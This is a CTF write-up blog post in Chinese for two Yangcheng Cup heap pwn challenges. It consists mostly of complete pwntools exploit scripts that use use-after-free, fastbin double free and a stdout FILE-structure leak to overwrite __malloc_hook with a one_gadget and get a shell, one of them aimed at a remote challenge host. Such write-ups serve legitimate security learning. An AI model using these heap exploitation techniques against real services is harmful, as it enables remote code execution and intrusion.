羊城杯

最新推荐文章于 2022-09-06 03:37:22 发布
最新推荐文章于 2022-09-06 03:37:22 发布
阅读量519 收藏
点赞数
分类专栏: 题目 学习 文章标签: 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/108609073
版权

签到

简单的uaf

rom pwn import *
context.terminal = ['tmux', 'splitw', '-h']
#p=process('./sg')
p=remote('183.129.189.60',10029)
elf=ELF('./sg')
libc=elf.libc

def add(size,name,mess):
	p.sendlineafter(': ','1')
	p.sendlineafter(':',str(size))
	p.sendlineafter(':',name)
	p.sendlineafter(':',mess)

def show():
	p.sendlineafter(': ','2')
	#p.sendlineafter(':',str(idx))

def delete(idx):
	p.sendlineafter(': ','3')
	p.sendlineafter(':',str(idx))

add(0x28,'doudou2','doudou')
add(0x68,'doudou1','doudou1')
#add(0x98,'doudou','doudou')
#add(0x18,'dd','aa')
delete(0)
add(0x98,'doudou3','doudou3')
add(0x28,'doudou4','doudou4')
delete(2)
delete(3)
delete(0)
show()
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4b78
system=libcbase+libc.sym['system']
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+0xf1207
add(0x68,'doudou5','doudou6')#4
#add(0x68,'doduou6','doudou7')#5
delete(1)
delete(4)
delete(1)
add(0x68,p64(malloc_hook-0x23),'dddd')
add(0x68,'aa','aa')
add(0x68,'aa','doudou')
add(0x68,'a'*19+p64(one_gadget),'doudou')
log.success('libcbase:  '+hex(libcbase))
p.sendlineafter(': ','1')
p.interactive()

babypwn

通过scanf函数触发malloc申请一个largebin大小的chunk会将fastbin的trunk放入unsortbin然后切申请堆块,double free写IO泄漏libc,之后就是正常攻击了大师傅的脚本(改动了一下
到了这一步,说明需要分配的是一块大的内存,或者 small bins 中找不到合适的 chunk。于是,ptmalloc 首先会遍历 fast bins 中的 chunk,将相邻的 chunk 进行合并, 并链接到 unsorted bin 中,

from pwn import *
context.log_level = 'DEBUG'
#context.terminal=['tmux','splite','-h']
context.terminal = ['tmux', 'splitw', '-h']
p=0
def pwn():
	global p
	def menu(ch):
		p.sendlineafter('choice :',str(ch))

	def new(size,name,content,sign=1):
		menu(1)
		p.sendlineafter("game's name:",str(size))
		p.sendafter("game's name:",name)
		if sign:
			p.sendlineafter("game's message:",content)
		else:
			p.sendline(content)
	def free(index):
		menu(2)
		p.sendlineafter('index:',str(index))


	p=process('./babypwn')
	elf=ELF('./babypwn')
	libc=elf.libc
	new(0x28,'doudou','aaa')#0
	new(0x68,'doudou2','bbb')#1
	new(0x68,'doudou3','cccc')#2
	new(0x68,'doudou4','ffff')
	free(2)
	menu(1)
	p.sendlineafter("game's name:",'0'*0x500)
	free(0)
	new(0x68,'\xDD\x25','aaa')
	free(1)
	free(3)
	free(1)
	new(0x68,'\x30','aaa')
	new(0x68,'dd','dd')
	new(0x68,'dd','dd')
	new(0x68,'dd','dd')
	menu(1)
	p.sendlineafter("game's name:",str(0x68))
	p.sendafter("game's name:",'\x00'*0x33 + p64(0xFBAD1800) + p64(0)*3 + '\x88')
#	p.sendlineafter("game's message:",'123123')
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-0x3c48e0
	log.success('libcbase: '+hex(libcbase))
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	one_gadget=libcbase+0xf1207
#	free(1)
	realloc=libcbase+libc.sym['__libc_realloc']
	p.sendlineafter("game's message:",'123123')
	free(1)
	free(3)
	free(1)
	new(0x68,p64(malloc_hook-0x23),'aaaa')
	new(0x68,'dd','dd')
	new(0x68,'dd','dd')
	new(0x68,'a'*11+p64(one_gadget)+p64(realloc+4),'ccc')
	p.interactive()
	return True

if __name__=="__main__":
	while 1:
		try:
			if pwn()==True:
				break
		except Exception as e:
			p.close()
			continue
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2020羊城CTF随缘Writeup
sash1mi
01-09 3405
2020羊城CTF随缘Writeup docker源码链接: https://github.com/k3vin-3/YCBCTF2020 Web部分 a_piece_of_java 考点:源码审计、java反序列化 PS:这道没整明白,直接给出官方WP 第一步,serialkiller 白名单过滤,构造动态代理触发 JDBC 连接: DatabaseInfo databaseInfo = new DatabaseInfo(); databaseInfo.setHost("x.x.x.x"); datab
Buuctf之web(五)
qq_50589021的博客
12-14 6478
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础目中非常常见,一般情况下只需要使
羊城2022--Writeup
m0_61596829的博客
09-06 1820
羊城2022--Writeup
2020YCBCTF羊城官方Writeup.pdf
10-28
2020YCBCTF羊城官方Writeup.pdf
2023 羊城 final
最新发布
11-21
附件
2023羊城 DASCTF EZ-Misc
09-03
2023羊城 DASCTF EZ-Misc
羊城快速通道
08-19
羊城快速通道
2021年“羊城”网络安全大赛部分Writeup
qq_42815161的博客
09-13 8100
MISC 签到 目描述:猜数字01-30,数字序列以Sanfor{md5(**-**-**-**)}形式提交 附件为一张gif 猛猜 图1 28准则 图2 8卦阵 图3 30而立之年 图4 北斗7星 图5 4大才子 图6 歼-20 图7 2只黄鹂鸣翠柳 图8 17来看流星雨 图9 23号乔丹 图10 1马当先 图11 12黄道 图12 新闻联播每晚19点首播 得到序列 md5(28-08-30-07-04-20-02-17-23-01-12-19) #SangFor{d93b7d..
2021羊城 pwn nologin
yongbaoii的博客
09-24 214
没开canary应该是能溢出 没开NX就是写shellcode
2021羊城CTF wp
qq_45603443的博客
09-12 4684
2021羊城WP(部分) ​Web web1 only 4 def start_flag(s): global stop_threads while True: if stop_threads: break f = io.BytesIO(b'a' * 1024 * 50) url = 'http://192.168.41.134:8000/? gwht=/var/lib/php5/sess_1&ycb=http://127.0.0.1' headers = {'Cookie': 'PHPSES
羊城战队writeup
weixin_45883223的博客
09-12 2245
com nc 183.129.189.60 10028 按1,得到一堆数字,z3解方程组,exp如下: from z3 import * a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20, a21, a22, a23, a24, a25, a26, a27, a28, a29, a30, a31, a32, a33, a34, a35 = Ints("a1 a2 a3 a4 a5
2021羊城 pwn BabyRop
yongbaoii的博客
09-24 250
显然没开啥保护 显然就是个溢出。 显然是个后门函数 显然作用是能把一个字节与异或一个1 显然有个字符/cin/sh 显然用函数2能把/cin/sh变成/bin/sh。 就一套rop带走就行。 exp from pwn import* r = remote("192.168.39.35", 11000) elf = ELF("./BabyRop") payload = 'a' * 44 + p32(0x80491fd) + p32(0x8049332) + p32(0x804c024) + p32(.
2021 羊城 pwn how2heap
yongbaoii的博客
09-24 190
PIE NX RELRO都没开,然后目说是2.23的libc。 显然是菜单。 add 地址都在bss上面,然后申请到的chunk都是0x20的,前面十个字节实我们可以的输入,再八个字节是输入的大小。 get get函数就是一个输出。 但是我们可以看到在第二个if的时候,result是int类型,所以可以有整数溢出。 del 显然也是一样的问。 但要注意的是free之后会覆盖上来再凑齐,中间不会留空挡。 而且其实我们注意到这个地方是0x2e,但是前面可以序号一直到0x2f,那么我如果先释放0x.
2021羊城pwn部分wp
eeeeeight的博客
09-12 6475
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2020羊城、第六届工控比赛部分目复现
m0re's blog
09-17 2354
本文目录羊城easyconBlackCat工控签到ICS_1ICS_4ICS_10ICS_12 羊城 easycon 环境打开 dirsearch扫描得到两个可以访问的文件 一个是index.html、另一个是index.php访问index.php会有个弹窗,看到 目中提示菜刀。所以猜测这个是连接密码。 使用蚁剑连接,成功连接。 但是,那个bbbbbbb.txt没有flag,是base64转图片,使用在线网站可以直接转换得到图片,这个是需要加上一个头的,缺少图片头的格式。 BlackCa
2021羊城 pwn whats your name
yongbaoii的博客
09-24 308
libc是2.23的。 保护是全开的。 沙箱是有的。 菜单。 set name edit name puts name delete name
Java pwn_虚拟PWN初探
weixin_39785858的博客
02-26 462
前言之前看到星盟Q群里面的消息,Freedom师傅在B站直播关于虚拟pwn入门的公开课,然后就去听了一波,感觉受益匪浅。之前一直以为虚拟pwn是超级复杂的东西,今年打比赛也遇到了好几次,一直无从下手。所以借着公开课学到的内容,复现了去年国赛虚拟pwn的那道。这里写一篇博客记录下来,当作自己博客园的第一篇技术博文吧!主要是为了水周五的分享会漏洞分析就像Freedom师傅所说的,虚拟pwn的难点不是...
GXY_CTF wp
Pdsdt1的博客
12-24 3186
文章首发于: Pdsdt‘s Blog 周六两场比赛Xman和GXY_CTF,Xman因为是选拔赛,身为二流web人员,自知和pwn爷爷们有差距,就没有太过于上心比赛,做了misc之后,就去做北工大的比赛了,这里主要记录一下,北工大的GXY_CTF,感谢队友们的辛勤付出,PWN师傅一天打两场比赛真的很辛苦,这里把战队的所有解出目贴出 WEB 禁止套娃 这个目是最后一波放的目,不过按照目顺...
羊城2020 wp
08-18
羊城2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值